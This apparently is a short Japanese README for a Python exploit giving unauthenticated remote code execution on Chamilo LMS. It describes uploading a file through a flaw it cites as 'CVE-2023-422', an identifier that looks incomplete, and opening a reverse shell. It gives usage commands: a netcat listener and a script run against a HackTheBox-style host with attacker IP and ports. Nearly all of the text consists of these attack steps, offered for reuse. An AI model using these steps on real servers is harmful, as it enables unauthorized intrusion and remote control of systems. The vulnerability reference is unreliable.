
Chamilo LMS 向けリモートコード実行
pip install requests
このPythonスクリプトは、脆弱性CVE-2023-422を利用してサーバーにファイルをアップロードし、そのファイルを使用してnetcatリスナーにリバースシェルを送信します。これらはすべて認証なしで実行できます。ただし、Pythonスクリプトを正常に使用するには、以下の手順に従う必要があります。
netcatリスナーを起動:
nc -lnvp 4444
Pythonスクリプトの実行(例):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
このエクスプロイトが役に立った場合は、スターを残してください :)